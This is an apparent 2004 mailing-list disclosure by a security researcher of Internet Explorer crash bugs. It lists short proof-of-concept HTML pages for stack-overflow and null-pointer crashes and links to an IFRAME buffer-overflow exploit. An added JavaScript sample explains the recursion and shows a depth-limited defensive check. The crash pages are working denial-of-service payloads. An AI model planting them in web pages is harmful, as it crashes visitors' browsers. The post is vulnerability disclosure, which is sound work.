
nested array sort() loop Stack overflow exception

Author: skylined@edup.tudelft.nl

Another flaw in IE:


<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>


Normally I would see if it's exploitable but I figure I'm not MS's pet bug finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know their own product better than I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I'm sure they will be more than willing to help you. I'm sure they will even reply to this message with technical details and a patch tomorrow.


Added to the list:

Current Internet Explorer DoS flaws:
nested array sort() loop Stack overflow exception:
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

IMG.src, onerror loop Stack overflow exception:
<HTML>
  <BODY>
   <IMG src="::" onError="this.src=this.src;">
   <IMG src="::" onError="this.src=this.src;">
  </BODY>
</HTML>

Fixed Internet Explorer flaws:
Page-Enter, blendTrans() NULL-pointer exception:
<HTML style="width:expression(navigate('?#'))">
  <HEAD>
   <META http-equiv="Page-Enter" content="blendTrans()">
  </HEAD>
</HTML>

"Object.method in for-loop" NULL-pointer exception:
<HTML>
  <SCRIPT language="javascript">
   for (a in window.open) { }
  </SCRIPT>
</HTML>

Links
InternetExploiter.html: Internet Explorer IFRAME src&name parameter BoF remote compromise advisory.
InternetExploiter.zip: Internet Explorer IFRAME src&name parameter BoF remote compromise exploit.

Copyright (C) 2002, 2004 Berend-Jan Wever <skylined@edup.tudelft.nl>
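How the post's loop deepens the structure, as an added example that is not part of the original post or its author's code: `new Array(a)` with a non-numeric argument yields a one-element array `[a]`, so every iteration adds one nesting level, and converting such a value to a string recurses once per level (Array.prototype.toString calls join, which converts each element). The helper names `nest`, `nestingDepth`, `sortIfShallow` and `stringifyOutcome` and the depth budget `MAX_DEPTH` are assumptions; the sample bounds the depth and catches the engine's RangeError rather than looping until the host runs out of stack.

```javascript
// Added example (not from the original post); helper names are assumptions.

// Build an array nested `depth` levels deep, the way the post's loop does:
// `new Array(x)` with a non-number argument yields the one-element array [x].
function nest(depth) {
  let a = new Array();
  for (let i = 0; i < depth; i++) {
    a = new Array(a); // same as [a]: one more level of nesting
  }
  return a;
}

// Measure nesting depth iteratively (explicit work stack), so the check itself
// cannot overflow the call stack on adversarial input.
function nestingDepth(value) {
  let max = 0;
  const stack = [[value, 0]];
  while (stack.length > 0) {
    const [v, d] = stack.pop();
    if (!Array.isArray(v)) continue;
    if (d + 1 > max) max = d + 1;
    for (const item of v) stack.push([item, d + 1]);
  }
  return max;
}

// Defensive wrapper: refuse to sort (and therefore stringify) structures
// deeper than a fixed budget instead of letting recursion depth follow input.
const MAX_DEPTH = 64;
function sortIfShallow(arr) {
  if (nestingDepth(arr) > MAX_DEPTH) {
    throw new Error(`nesting depth exceeds ${MAX_DEPTH}`);
  }
  return arr.slice().sort();
}

// Unguarded String() on a deep structure: the toString -> join -> ToString(element)
// chain recurses once per level, so a modern engine throws a catchable RangeError
// for very deep input rather than taking the host down.
function stringifyOutcome(depth) {
  try {
    const s = String(nest(depth));
    return { ok: true, length: s.length };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}
```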
